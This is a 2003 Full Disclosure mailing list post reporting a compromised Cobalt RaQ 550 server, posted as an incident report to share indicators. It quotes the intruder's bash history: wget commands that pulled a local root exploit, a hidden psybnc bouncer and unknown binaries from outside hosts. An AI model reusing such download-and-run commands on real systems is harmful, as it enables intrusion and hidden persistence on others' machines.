Full Disclosure mailing list archives
raq 550 compromised
From: "adf--at--Code511.com" <adf () code511 com>
Date: Tue, 7 Oct 2003 03:37:24 +0200
sorry for the "cross-post", I just saw this message on cobalt-security mailing list today:
an user got his raq 550 compromised and he posted some bash history he found:
-wget www.ps-lov.us/pizda.tgz :unknown binaries (yet?) named "mumu" -wget snow.prohosting.com/muiemuie/p.tar.gz :Linux kernel ptrace/kmod local root exploit from ipsec -wget snow.prohosting.com/muiemuie/p.tgz : it will decompress psybnc in a hidden folder (.bash) -wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline) -wget 65.113.119.133/muiemuie/km3.tgz ----->(file offline) anyone seen pizda or mumu ?if you interested in all details of the post: http://list.cobalt.com/pipermail/cobalt-security/2003-October/ 008607.html
-deepquest _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: RE: [Troll-Disclosure] Has Verisign time ar rived ? Joshua Thomas (Oct 03)
- RE: RE: [Troll-Disclosure] Has Verisign time ar rived ? Jonathan A. Zdziarski (Oct 03)
- raq 550 compromised adf--at--Code511.com (Oct 07)
- RE: raq 550 compromised Bojan Zdrnja (Oct 07)